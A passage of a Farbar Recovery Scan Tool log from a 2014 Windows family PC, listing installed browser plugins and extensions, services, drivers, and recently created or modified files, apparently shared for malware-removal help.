BHO: Java™ Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files\Java\jre1.8.0_25\bin\ssv.dll (Oracle Corporation)
BHO: avast! Online Security -> {8E5E2654-AD2D-48bf-AC2D-D17F00898D06} -> C:\Program Files\Alwil Software\Avast5\aswWebRepIE.dll (AVAST Software)
BHO: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll (Microsoft Corp.)
BHO: Windows Live Messenger Companion Helper -> {9FDDE16B-836F-4806-AB1F-1455CBEFF289} -> C:\Program Files\Windows Live\Companion\companioncore.dll (Microsoft Corporation)
BHO: Java™ Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files\Java\jre1.8.0_25\bin\jp2ssv.dll (Oracle Corporation)
Winsock: Catalog5 05 C:\Program Files\Bonjour\mdnsNSP.dll [121704] (Apple Inc.)
Hosts: There are more than one entry in Hosts. See Hosts section of Addition.txt
Tcpip\Parameters: [DhcpNameServer] 192.168.1.1

FireFox:
========
FF ProfilePath: C:\Users\Nick\AppData\Roaming\Mozilla\Firefox\Profiles\ghs5oui9.default
FF Homepage: hxxp://www.google.com/
FF NetworkProxy: "type", 0
FF Plugin: @adobe.com/FlashPlayer -> C:\Windows\system32\Macromed\Flash\NPSWF32_15_0_0_189.dll ()
FF Plugin: @Apple.com/iTunes,version=1.0 -> C:\Program Files\iTunes\Mozilla Plugins\npitunes.dll ()
FF Plugin: @java.com/DTPlugin,version=11.25.2 -> C:\Program Files\Java\jre1.8.0_25\bin\dtplugin\npDeployJava1.dll (Oracle Corporation)
FF Plugin: @java.com/JavaPlugin,version=11.25.2 -> C:\Program Files\Java\jre1.8.0_25\bin\plugin2\npjp2.dll (Oracle Corporation)
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files\Microsoft Silverlight\5.1.30514.0\npctrl.dll ( Microsoft Corporation)
FF Plugin: @microsoft.com/WLPG,version=15.4.3502.0922 -> C:\Program Files\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
FF Plugin: @microsoft.com/WLPG,version=15.4.3555.0308 -> C:\Program Files\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
FF Plugin: @microsoft.com/WPF,version=3.5 -> c:\Windows\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\NPWPF.dll (Microsoft Corporation)
FF Plugin: @pandonetworks.com/PandoWebPlugin -> C:\Program Files\Pando Networks\Media Booster\npPandoWebPlugin.dll (Pando Networks)
FF Plugin: @real.com/nppl3260;version=16.0.0.282 -> C:\Program Files\Real\RealPlayer\Netscape6\nppl3260.dll (RealNetworks, Inc.)
FF Plugin: @real.com/nprndlchromebrowserrecordext;version=1.3.0 -> C:\ProgramData\RealNetworks\RealDownloader\BrowserPlugins\MozillaPlugins\nprndlchromebrowserrecordext.dll (RealNetworks, Inc.)
FF Plugin: @real.com/nprndlhtml5videoshim;version=1.3.0 -> C:\ProgramData\RealNetworks\RealDownloader\BrowserPlugins\MozillaPlugins\nprndlhtml5videoshim.dll (RealNetworks, Inc.)
FF Plugin: @real.com/nprndlpepperflashvideoshim;version=1.3.0 -> C:\ProgramData\RealNetworks\RealDownloader\BrowserPlugins\MozillaPlugins\nprndlpepperflashvideoshim.dll (RealNetworks, Inc.)
FF Plugin: @real.com/nprpplugin;version=16.0.0.282 -> C:\Program Files\Real\RealPlayer\Netscape6\nprpplugin.dll (RealPlayer)
FF Plugin: @realnetworks.com/npdlplugin;version=1 -> C:\ProgramData\RealNetworks\RealDownloader\BrowserPlugins\npdlplugin.dll (RealDownloader)
FF Plugin: @tools.google.com/Google Update;version=3 -> C:\Program Files\Google\Update\1.3.24.15\npGoogleUpdate3.dll (Google Inc.)
FF Plugin: @tools.google.com/Google Update;version=9 -> C:\Program Files\Google\Update\1.3.24.15\npGoogleUpdate3.dll (Google Inc.)
FF Plugin: adobe.com/AdobeAAMDetect -> C:\Program Files\Common Files\Adobe\OOBE\PDApp\CCM\Utilities\npAdobeAAMDetect32.dll (Adobe Systems)
FF Plugin HKCU: @talk.google.com/GoogleTalkPlugin -> C:\Users\Nick\AppData\Roaming\Mozilla\plugins\npgoogletalk.dll (Google)
FF Plugin HKCU: @talk.google.com/O1DPlugin -> C:\Users\Nick\AppData\Roaming\Mozilla\plugins\npo1d.dll (Google)
FF Plugin HKCU: @tools.google.com/Google Update;version=3 -> C:\Users\Nick\AppData\Local\Google\Update\1.3.24.7\npGoogleUpdate3.dll (Google Inc.)
FF Plugin HKCU: @tools.google.com/Google Update;version=9 -> C:\Users\Nick\AppData\Local\Google\Update\1.3.24.7\npGoogleUpdate3.dll (Google Inc.)
FF Plugin HKCU: pandonetworks.com/PandoWebPlugin -> C:\Program Files\Pando Networks\Media Booster\npPandoWebPlugin.dll (Pando Networks)
FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\np-mswmp.dll (Microsoft Corporation)
FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\nppdf32.dll (Adobe Systems Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\nppl3260.dll (RealNetworks, Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\npqtplugin.dll (Apple Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\npqtplugin2.dll (Apple Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\npqtplugin3.dll (Apple Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\npqtplugin4.dll (Apple Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\npqtplugin5.dll (Apple Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\npqtplugin6.dll (Apple Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\nprpplugin.dll (RealPlayer)
FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\npwachk.dll (Nullsoft, Inc.)
FF Plugin ProgramFiles/Appdata: C:\Users\Nick\AppData\Roaming\mozilla\plugins\npgoogletalk.dll (Google)
FF Plugin ProgramFiles/Appdata: C:\Users\Nick\AppData\Roaming\mozilla\plugins\npo1d.dll (Google)
FF Extension: LogMeIn, Inc. Remote Access Plugin - C:\Users\Nick\AppData\Roaming\Mozilla\Firefox\Profiles\ghs5oui9.default\Extensions\LogMeInClient@logmein.com [2014-10-28]
FF Extension: Microsoft .NET Framework Assistant - C:\Users\Nick\AppData\Roaming\Mozilla\Firefox\Profiles\ghs5oui9.default\Extensions\{20a82645-c095-46ed-80e3-08825760534b} [2010-12-16]
FF Extension: Reddit Enhancement Suite - C:\Users\Nick\AppData\Roaming\Mozilla\Firefox\Profiles\ghs5oui9.default\Extensions\jid1-xUfzOsOFlzSOXg@jetpack.xpi [2013-05-17]
FF Extension: FlashGot - C:\Users\Nick\AppData\Roaming\Mozilla\Firefox\Profiles\ghs5oui9.default\Extensions\{19503e42-ca3c-4c27-b1e2-9cdb2170ee34}.xpi [2011-03-22]
FF Extension: StumbleUpon - C:\Users\Nick\AppData\Roaming\Mozilla\Firefox\Profiles\ghs5oui9.default\Extensions\{AE93811A-5C9A-4d34-8462-F7B864FC4696}.xpi [2011-12-30]
FF Extension: Adblock Plus - C:\Users\Nick\AppData\Roaming\Mozilla\Firefox\Profiles\ghs5oui9.default\Extensions\{d10d0bf8-f5b5-c8b4-a8b2-2b9879e08c5d}.xpi [2011-03-27]
FF Extension: Tab Mix Plus - C:\Users\Nick\AppData\Roaming\Mozilla\Firefox\Profiles\ghs5oui9.default\Extensions\{dc572301-7619-498c-a57d-39143191b318}.xpi [2011-05-11]
FF Extension: Java Console - C:\Program Files\Mozilla Firefox\extensions\{CAFEEFAC-0016-0000-0033-ABCDEFFEDCBA} [2014-11-01]
FF Extension: Java Console - C:\Program Files\Mozilla Firefox\extensions\{CAFEEFAC-0016-0000-0035-ABCDEFFEDCBA} [2014-11-01]
FF Extension: Java Console - C:\Program Files\Mozilla Firefox\extensions\{CAFEEFAC-0016-0000-0037-ABCDEFFEDCBA} [2014-11-01]
FF HKLM\...\Firefox\Extensions: [{20a82645-c095-46ed-80e3-08825760534b}] - c:\Windows\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\DotNetAssistantExtension
FF Extension: Microsoft .NET Framework Assistant - c:\Windows\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\DotNetAssistantExtension [2010-11-21]
FF HKLM\...\Firefox\Extensions: [{34712C68-7391-4c47-94F3-8F88D49AD632}] - C:\ProgramData\RealNetworks\RealDownloader\BrowserPlugins\Firefox\Ext
FF Extension: RealDownloader - C:\ProgramData\RealNetworks\RealDownloader\BrowserPlugins\Firefox\Ext [2013-01-17]
FF HKLM\...\Firefox\Extensions: [wrc@avast.com] - C:\Program Files\Alwil Software\Avast5\WebRep\FF
FF Extension: Avast Online Security - C:\Program Files\Alwil Software\Avast5\WebRep\FF [2011-07-07]
FF Extension: No Name - wrc@avast.com [Not Found]

Chrome:
=======
CHR dev: Chrome dev build detected! <======= ATTENTION
CHR Profile: C:\Users\Nick\AppData\Local\Google\Chrome\User Data\Default
CHR Extension: (Pin It) - C:\Users\Nick\AppData\Local\Google\Chrome\User Data\Default\Extensions\aeocpmaimgdkdkkhnilgfoicilnefefh [2014-07-06]
CHR Extension: (Hot Virtual Keyboard Extension) - C:\Users\Nick\AppData\Local\Google\Chrome\User Data\Default\Extensions\bdejgojmfhngmomodldpdppfbhoajadl [2014-09-04]
CHR Extension: (YouTube) - C:\Users\Nick\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2013-01-17]
CHR Extension: (Tetris Flash) - C:\Users\Nick\AppData\Local\Google\Chrome\User Data\Default\Extensions\cfhhalmjbofkjcgefcaejjdicdddpkkk [2014-07-06]
CHR Extension: (Google Search) - C:\Users\Nick\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2013-09-07]
CHR Extension: (RealDownloader) - C:\Users\Nick\AppData\Local\Google\Chrome\User Data\Default\Extensions\idhngdhcfkoamngbedgpaokgjbnpdiji [2013-01-17]
CHR Extension: (Music Plus for Google Play Music) - C:\Users\Nick\AppData\Local\Google\Chrome\User Data\Default\Extensions\ipfnecmlncaiipncipkgijboddcdmego [2014-08-25]
CHR Extension: (Chrome In-App Payments service) - C:\Users\Nick\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2013-09-07]
CHR Extension: (Pink My Facebook) - C:\Users\Nick\AppData\Local\Google\Chrome\User Data\Default\Extensions\okcdpfndmnjdijikpehblfeancekjcgo [2014-09-23]
CHR Extension: (Gmail) - C:\Users\Nick\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2013-01-17]
CHR Extension: (A HREF) - C:\Users\Nick\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkanabbomegdcfhkfppalghjamfekegb [2014-10-13]
CHR HKLM\...\Chrome\Extension: [gomekmidlodglbbmalcneegieacbdmki] - C:\Program Files\Alwil Software\Avast5\WebRep\Chrome\aswWebRepChrome.crx [2014-10-26]
CHR HKLM\...\Chrome\Extension: [idhngdhcfkoamngbedgpaokgjbnpdiji] - C:\ProgramData\RealNetworks\RealDownloader\BrowserPlugins\Chrome\Ext\realdownloader.crx [2012-11-29]

========================== Services (Whitelisted) =================

(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)

R2 avast! Antivirus; C:\Program Files\Alwil Software\Avast5\AvastSvc.exe [50344 2014-10-26] (AVAST Software)
R3 AvastVBoxSvc; C:\Program Files\Alwil Software\Avast5\ng\vbox\AvastVBoxSVC.exe [3192344 2014-10-26] (Avast Software)
S4 Futuremark SystemInfo Service; C:\Program Files\Futuremark\Futuremark SystemInfo\FMSISvc.exe [135584 2011-12-09] (Futuremark Corporation)
R2 Hamachi2Svc; C:\Program Files\LogMeIn Hamachi\hamachi-2.exe [1440080 2013-06-28] (LogMeIn Inc.)
S3 McComponentHostService; C:\Program Files\McAfee Security Scan\3.0.285\McCHSvc.exe [234776 2012-09-05] (McAfee, Inc.)
S3 RealNetworks Downloader Resolver Service; C:\Program Files\RealNetworks\RealDownloader\rndlresolversvc.exe [38608 2012-11-29] ()
S3 SwitchBoard; C:\Program Files\Common Files\Adobe\SwitchBoard\SwitchBoard.exe [517096 2010-02-19] (Adobe Systems Incorporated) [File not signed]
R2 uvnc_service; C:\Program Files\uvnc bvba\UltraVNC\WinVNC.exe [1795864 2014-10-01] (UltraVNC)

==================== Drivers (Whitelisted) ====================

(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)

R2 aswHwid; C:\Windows\system32\drivers\aswHwid.sys [24184 2014-10-26] ()
R2 aswMonFlt; C:\Windows\system32\drivers\aswMonFlt.sys [70384 2014-10-31] (AVAST Software)
R1 aswRdr; C:\Windows\system32\drivers\aswRdr.sys [55240 2014-10-26] (AVAST Software)
R0 aswRvrt; C:\Windows\system32\Drivers\aswRvrt.sys [49944 2014-10-26] ()
R1 aswSnx; C:\Windows\system32\drivers\aswSnx.sys [787800 2014-10-31] (AVAST Software)
R1 aswSP; C:\Windows\system32\drivers\aswSP.sys [422760 2014-10-26] (AVAST Software)
R1 aswTdi; C:\Windows\system32\drivers\aswTdi.sys [57928 2014-10-26] (AVAST Software)
R0 aswVmm; C:\Windows\system32\Drivers\aswVmm.sys [206248 2014-10-26] ()
R1 dtsoftbus01; C:\Windows\System32\DRIVERS\dtsoftbus01.sys [242240 2012-10-05] (DT Soft Ltd)
R3 hamachi; C:\Windows\System32\DRIVERS\hamachi.sys [26176 2009-03-18] (LogMeIn, Inc.)
R1 SCDEmu; C:\Windows\system32\Drivers\SCDEmu.sys [59388 2009-11-08] (PowerISO Computing, Inc.) [File not signed]
R2 VBoxAswDrv; C:\Program Files\Alwil Software\Avast5\ng\vbox\VBoxAswDrv.sys [218192 2014-10-26] (Avast Software)
S3 zghsdiag; C:\Windows\System32\DRIVERS\zghsdiag.sys [106752 2011-05-26] (ZTE Incorporated)
S3 zghsmdm; C:\Windows\System32\DRIVERS\zghsmdm.sys [106752 2011-05-26] (ZTE Incorporated)
S3 zghsnmea; C:\Windows\System32\DRIVERS\zghsnmea.sys [106752 2011-05-26] (ZTE Incorporated)
S4 blbdrive; \SystemRoot\system32\drivers\blbdrive.sys [X]
S3 IpInIp; system32\DRIVERS\ipinip.sys [X]
S3 lmimirr; system32\DRIVERS\lmimirr.sys [X]
S3 NwlnkFlt; system32\DRIVERS\nwlnkflt.sys [X]
S3 NwlnkFwd; system32\DRIVERS\nwlnkfwd.sys [X]
S3 radpms; system32\DRIVERS\radpms.sys [X]

==================== NetSvcs (Whitelisted) ===================


(If an item is included in the fixlist, it will be removed from the registry. Any associated file could be listed separately to be moved.)


==================== One Month Created Files and Folders ========

(If an entry is included in the fixlist, the file\folder will be moved.)

2014-11-01 22:23 - 2014-11-01 22:23 - 01105920 _____ (Farbar) C:\Users\Nick\Desktop\FRST.exe
2014-11-01 12:39 - 2014-11-01 12:39 - 00000199 _____ () C:\Windows\system32\2014-11-01-19-39-27.021-AvastVBoxSVC.exe-2552.log
2014-11-01 12:31 - 2014-11-01 12:31 - 00000249 _____ () C:\Windows\system32\2014-11-01-19-31-32.097-aswFe.exe-4892.log
2014-11-01 12:16 - 2014-11-01 12:31 - 00000249 _____ () C:\Windows\system32\2014-11-01-19-16-09.090-aswFe.exe-4424.log
2014-11-01 12:16 - 2014-11-01 12:16 - 00000199 _____ () C:\Windows\system32\2014-11-01-19-16-00.068-AvastVBoxSVC.exe-3784.log
2014-11-01 12:04 - 2014-11-01 12:04 - 00000000 ____D () C:\Windows\Sun
2014-11-01 12:02 - 2014-11-01 12:02 - 00000000 ____D () C:\Program Files\Common Files\Java
2014-11-01 12:02 - 2014-11-01 12:00 - 00096680 _____ (Oracle Corporation) C:\Windows\system32\WindowsAccessBridge.dll
2014-11-01 12:01 - 2014-11-01 12:01 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Java
2014-11-01 11:58 - 2014-11-01 11:58 - 00638376 _____ (Oracle Corporation) C:\Users\Nick\Desktop\jre-8u25-windows-i586-iftw.exe
2014-11-01 11:55 - 2014-11-01 11:55 - 00000000 ____D () C:\Program Files\Mozilla Firefox
2014-11-01 11:48 - 2014-11-01 22:24 - 00020848 _____ () C:\Users\Nick\Desktop\FRST.txt
2014-11-01 11:45 - 2014-11-01 11:45 - 00002333 _____ () C:\Users\Nick\Desktop\JRT.txt
2014-11-01 11:38 - 2014-11-01 11:38 - 00000000 ____D () C:\Windows\ERUNT
2014-11-01 11:37 - 2014-11-01 11:38 - 00000000 ____D () C:\Windows\system32\vbox
2014-11-01 11:37 - 2014-11-01 11:37 - 01706359 _____ (Thisisu) C:\Users\Nick\Desktop\JRT.exe
2014-11-01 10:57 - 2010-08-30 08:34 - 00536576 _____ (SQLite Development Team) C:\Windows\system32\sqlite3.dll
2014-11-01 10:55 - 2014-11-01 11:32 - 00000000 ____D () C:\AdwCleaner
2014-11-01 10:55 - 2014-11-01 10:55 - 01375089 _____ () C:\Users\Nick\Desktop\AdwCleaner.exe
2014-11-01 10:22 - 2014-11-01 10:52 - 00000000 ____D () C:\ProgramData\Malwarebytes' Anti-Malware (portable)
2014-11-01 10:21 - 2014-11-01 10:52 - 00000000 ____D () C:\Users\Nick\Desktop\mbar
2014-11-01 10:20 - 2014-11-01 10:20 - 14349744 _____ (Malwarebytes Corp.) C:\Users\Nick\Desktop\mbar-1.07.0.1012.exe
2014-11-01 10:09 - 2014-11-01 10:09 - 00039769 _____ () C:\Users\Nick\Desktop\Addition.txt
2014-11-01 10:07 - 2014-11-01 22:24 - 00000000 ____D () C:\FRST
2014-11-01 09:52 - 2014-11-01 09:52 - 00854448 _____ () C:\Users\Nick\Desktop\SecurityCheck.exe
2014-10-28 12:23 - 2014-10-28 12:23 - 00000000 ____D () C:\Users\Nick\AppData\Roaming\UltraVNC
2014-10-28 12:14 - 2014-10-28 12:23 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\UltraVNC
2014-10-28 12:14 - 2014-10-28 12:14 - 00000000 ____D () C:\Program Files\uvnc bvba
2014-10-26 21:28 - 2014-10-26 21:28 - 00291352 _____ (AVAST Software) C:\Windows\system32\aswBoot.exe
2014-10-26 21:28 - 2014-10-26 21:28 - 00043152 _____ (AVAST Software) C:\Windows\avastSS.scr
2014-10-26 21:28 - 2014-10-26 21:28 - 00001842 _____ () C:\Users\Public\Desktop\Avast Free Antivirus.lnk
2014-10-26 21:18 - 2014-10-26 21:23 - 00004245 _____ () C:\Windows\system32\jupdate-1.7.0_71-b14.log
2014-10-26 20:55 - 2014-10-26 20:55 - 00000000 ____D () C:\Users\Hannah\AppData\Local\{C904B1C1-3E1E-4488-AF25-7A18B11AC300}
2014-10-26 19:59 - 2014-11-01 10:22 - 00113880 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\MBAMSwissArmy.sys
2014-10-26 19:56 - 2014-10-26 19:56 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\McAfee Security Scan Plus
2014-10-26 19:56 - 2014-10-26 19:56 - 00000000 ____D () C:\ProgramData\McAfee Security Scan
2014-10-26 19:56 - 2014-10-26 19:56 - 00000000 ____D () C:\Program Files\McAfee Security Scan
2014-10-26 18:22 - 2014-10-26 18:26 - 00000859 _____ () C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk
2014-10-26 18:22 - 2014-10-26 18:22 - 00000000 ____D () C:\Users\Dylan\AppData\Roaming\Malwarebytes
2014-10-22 18:44 - 2014-10-22 18:45 - 00000000 ____D () C:\Users\Hannah\AppData\Local\{65D13997-5F32-456F-9964-9BB07D32E768}
2014-10-21 03:17 - 2014-06-15 15:18 - 01131664 _____ (Microsoft Corporation) C:\Windows\system32\dfshim.dll
2014-10-21 03:17 - 2014-06-13 11:22 - 00156824 _____ (Microsoft Corporation) C:\Windows\system32\mscorier.dll
2014-10-21 03:17 - 2014-06-13 11:22 - 00081560 _____ (Microsoft Corporation) C:\Windows\system32\mscories.dll
2014-10-21 03:16 - 2014-09-23 16:37 - 03637248 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.dll
2014-10-21 03:16 - 2014-09-23 16:37 - 00834048 _____ (Microsoft Corporation) C:\Windows\system32\wininet.dll
2014-10-21 03:16 - 2014-09-23 16:37 - 00671744 _____ (Microsoft Corporation) C:\Windows\system32\mstime.dll
2014-10-21 03:16 - 2014-09-23 16:37 - 00498688 _____ (Microsoft Corporation) C:\Windows\system32\msfeeds.dll
2014-10-21 03:16 - 2014-09-23 16:37 - 00480768 _____ (Microsoft Corporation) C:\Windows\system32\mshtmled.dll
2014-10-21 03:16 - 2014-09-23 16:37 - 00380928 _____ (Microsoft Corporation) C:\Windows\system32\ieapfltr.dll
2014-10-21 03:16 - 2014-09-23 16:37 - 00273408 _____ (Microsoft Corporation) C:\Windows\system32\iertutil.dll
2014-10-21 03:16 - 2014-09-23 16:37 - 00193024 _____ (Microsoft Corporation) C:\Windows\system32\iepeers.dll
2014-10-21 03:16 - 2014-09-23 16:37 - 00180736 _____ (Microsoft Corporation) C:\Windows\system32\ieui.dll
2014-10-21 03:16 - 2014-09-23 16:37 - 00106496 _____ (Microsoft Corporation) C:\Windows\system32\url.dll
2014-10-21 03:16 - 2014-09-23 16:37 - 00028160 _____ (Microsoft Corporation) C:\Windows\system32\jsproxy.dll
2014-10-21 03:16 - 2014-09-23 16:36 - 00347136 _____ (Microsoft Corporation) C:\Windows\system32\dxtmsft.dll
2014-10-21 03:16 - 2014-09-23 16:36 - 00214528 _____ (Microsoft Corporation) C:\Windows\system32\dxtrans.dll
2014-10-21 03:16 - 2014-09-23 16:36 - 00019968 _____ (Microsoft Corporation) C:\Windows\system32\corpol.dll
2014-10-21 03:16 - 2014-09-23 15:27 - 01383424 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.tlb
2014-10-21 03:15 - 2014-09-23 16:37 - 06119936 _____ (Microsoft Corporation) C:\Windows\system32\ieframe.dll
2014-10-21 03:15 - 2014-09-23 16:37 - 01827328 _____ (Microsoft Corporation) C:\Windows\system32\inetcpl.cpl
2014-10-21 03:15 - 2014-09-23 16:37 - 01177600 _____ (Microsoft Corporation) C:\Windows\system32\urlmon.dll
2014-10-21 03:15 - 2014-09-23 11:05 - 00389632 _____ (Microsoft Corporation) C:\Windows\system32\html.iec
2014-10-21 03:13 - 2014-09-27 16:29 - 02054656 _____ (Microsoft Corporation) C:\Windows\system32\win32k.sys
2014-10-21 03:03 - 2014-09-04 16:27 - 00143360 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\fastfat.sys
2014-10-21 03:00 - 2014-09-16 09:56 - 00066560 _____ (Microsoft Corporation) C:\Windows\system32\packager.dll
2014-10-09 08:47 - 2014-10-09 08:47 - 00155248 _____ () C:\Windows\Minidump\Mini100914-01.dmp
2014-10-09 08:22 - 2014-10-09 08:22 - 00000000 ____D () C:\Users\Hannah\AppData\Local\{69E0C68D-60C0-41AE-8CBC-FD37C8FBD37E}

==================== One Month Modified Files and Folders =======

(If an entry is included in the fixlist, the file\folder will be moved.)

2014-11-01 22:20 - 2010-11-20 21:01 - 00000420 ____H () C:\Windows\Tasks\User_Feed_Synchronization-{F9D43FD3-5681-4AEF-A862-17FF1653F989}.job
2014-11-01 22:18 - 2006-11-02 05:35 - 00000000 ____D () C:\Windows\system32\FxsTmp
2014-11-01 22:16 - 2013-04-10 14:22 - 00000904 _____ () C:\Windows\Tasks\GoogleUpdateTaskUserS-1-5-21-2927482541-673307907-4085399872-1003UA.job
2014-11-01 22:06 - 2012-04-03 11:24 - 00000830 _____ () C:\Windows\Tasks\Adobe Flash Player Updater.job
2014-11-01 21:33 - 2010-11-20 20:35 - 00000882 _____ () C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job
2014-11-01 21:33 - 2010-11-20 20:35 - 00000878 _____ () C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job
2014-11-01 20:55 - 2012-04-18 16:44 - 01765663 _____ () C:\Windows\WindowsUpdate.log
2014-11-01 20:38 - 2006-11-02 05:46 - 00004048 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-2P-1.C7483456-A289-439d-8115-601632D005A0
2014-11-01 20:38 - 2006-11-02 05:46 - 00004048 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-2P-0.C7483456-A289-439d-8115-601632D005A0
2014-11-01 12:38 - 2012-04-27 19:39 - 00000000 ____D () C:\Program Files\Mozilla Maintenance Service
2014-11-01 12:38 - 2006-11-02 06:00 - 00000006 ____H () C:\Windows\Tasks\SA.DAT
2014-11-01 12:37 - 2006-11-02 06:00 - 00032556 _____ () C:\Windows\Tasks\SCHEDLGU.TXT
2014-11-01 12:03 - 2013-10-16 09:39 - 00000000 ____D () C:\ProgramData\Oracle
2014-11-01 12:01 - 2010-12-24 20:28 - 00000000 ____D () C:\Program Files\Opera
2014-11-01 11:59 - 2010-12-06 17:58 - 00000000 ____D () C:\Program Files\Java
2014-11-01 11:34 - 2013-10-20 11:02 - 00806986 _____ () C:\Windows\PFRO.log
2014-11-01 10:55 - 2014-08-31 11:57 - 00075480 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mbamchameleon.sys
2014-11-01 08:16 - 2013-04-10 14:22 - 00000852 _____ () C:\Windows\Tasks\GoogleUpdateTaskUserS-1-5-21-2927482541-673307907-4085399872-1003Core.job
2014-11-01 04:37 - 2010-11-25 21:52 - 00000416 ____H () C:\Windows\Tasks\User_Feed_Synchronization-{C479CE1A-76B9-4D6F-8D71-575C334B2024}.job
2014-10-31 21:28 - 2011-07-07 12:05 - 00787800 _____ (AVAST Software) C:\Windows\system32\Drivers\aswsnx.sys
2014-10-31 21:28 - 2010-11-20 20:35 - 00070384 _____ (AVAST Software) C:\Windows\system32\Drivers\aswmonflt.sys
2014-10-28 17:14 - 2014-07-06 19:10 - 00000000 ____D () C:\ProgramData\65214779c8ff1a47
2014-10-28 17:02 - 2014-08-19 06:10 - 00000000 ____D () C:\Users\Bill\AppData\Roaming\DropboxMaster
2014-10-28 17:02 - 2011-08-22 17:24 - 00000000 ____D () C:\Users\Bill\AppData\Roaming\Dropbox
2014-10-28 12:06 - 2013-10-19 11:31 - 00004923 _____ () C:\Windows\setupact.log
2014-10-28 06:35 - 2010-11-21 10:12 - 00229000 ____N (Microsoft Corporation) C:\Windows\system32\MpSigStub.exe
2014-10-26 21:54 - 2011-05-04 21:14 - 00000000 ____D () C:\Users\Hannah\AppData\Roaming\uTorrent
2014-10-26 21:53 - 2013-04-14 19:04 - 00000000 ____D () C:\Users\Hannah\Tracing
2014-10-26 21:53 - 2010-11-22 19:19 - 00000000 ____D () C:\Users\Hannah\AppData\Local\LogMeIn Hamachi
2014-10-26 21:52 - 2014-06-03 19:50 - 00000000 ____D () C:\Users\Hannah\AppData\Local\Backup Assistant Plus
2014-10-26 21:28 - 2014-08-01 11:54 - 00024184 _____ () C:\Windows\system32\Drivers\aswHwid.sys
2014-10-26 21:28 - 2013-09-07 17:22 - 00206248 _____ () C:\Windows\system32\Drivers\aswVmm.sys
2014-10-26 21:28 - 2013-09-07 17:22 - 00049944 _____ () C:\Windows\system32\Drivers\aswRvrt.sys
2014-10-26 21:28 - 2010-11-20 20:35 - 00422760 _____ (AVAST Software) C:\Windows\system32\Drivers\aswsp.sys
2014-10-26 21:28 - 2010-11-20 20:35 - 00057928 _____ (AVAST Software) C:\Windows\system32\Drivers\aswTdi.sys
2014-10-26 21:28 - 2010-11-20 20:35 - 00055240 _____ (AVAST Software) C:\Windows\system32\Drivers\aswRdr.sys
2014-10-26 21:02 - 2012-12-16 23:41 - 00000680 _____ () C:\Users\Dylan\AppData\Local\d3d9caps.dat
2014-10-26 19:57 - 2012-12-14 01:04 - 00000000 ____D () C:\Users\Dylan\AppData\Local\Adobe
2014-10-26 19:56 - 2012-04-03 11:24 - 00701104 _____ (Adobe Systems Incorporated) C:\Windows\system32\FlashPlayerApp.exe
2014-10-26 19:56 - 2011-08-21 09:55 - 00071344 _____ (Adobe Systems Incorporated) C:\Windows\system32\FlashPlayerCPLApp.cpl
2014-10-26 19:52 - 2012-10-20 19:44 - 00000000 ____D () C:\Windows\WinBrick.96
2014-10-26 18:26 - 2014-08-31 11:57 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Malware
2014-10-26 18:26 - 2014-08-31 11:57 - 00000000 ____D () C:\Program Files\Malwarebytes Anti-Malware
2014-10-21 03:52 - 2006-11-02 04:18 - 00000000 ____D () C:\Windows\Microsoft.NET
2014-10-21 03:38 - 2006-11-02 05:46 - 03688432 _____ () C:\Windows\system32\FNTCACHE.DAT
2014-10-21 03:12 - 2013-08-20 03:09 - 00000000 ____D () C:\Windows\system32\MRT
2014-10-21 03:03 - 2006-11-02 03:24 - 100290944 _____ (Microsoft Corporation) C:\Windows\system32\mrt.exe
2014-10-09 09:07 - 2006-11-02 04:18 - 00000000 ____D () C:\Windows\rescache
2014-10-09 09:06 - 2014-09-28 16:10 - 00000000 ____D () C:\Users\Hannah\Desktop\Nick
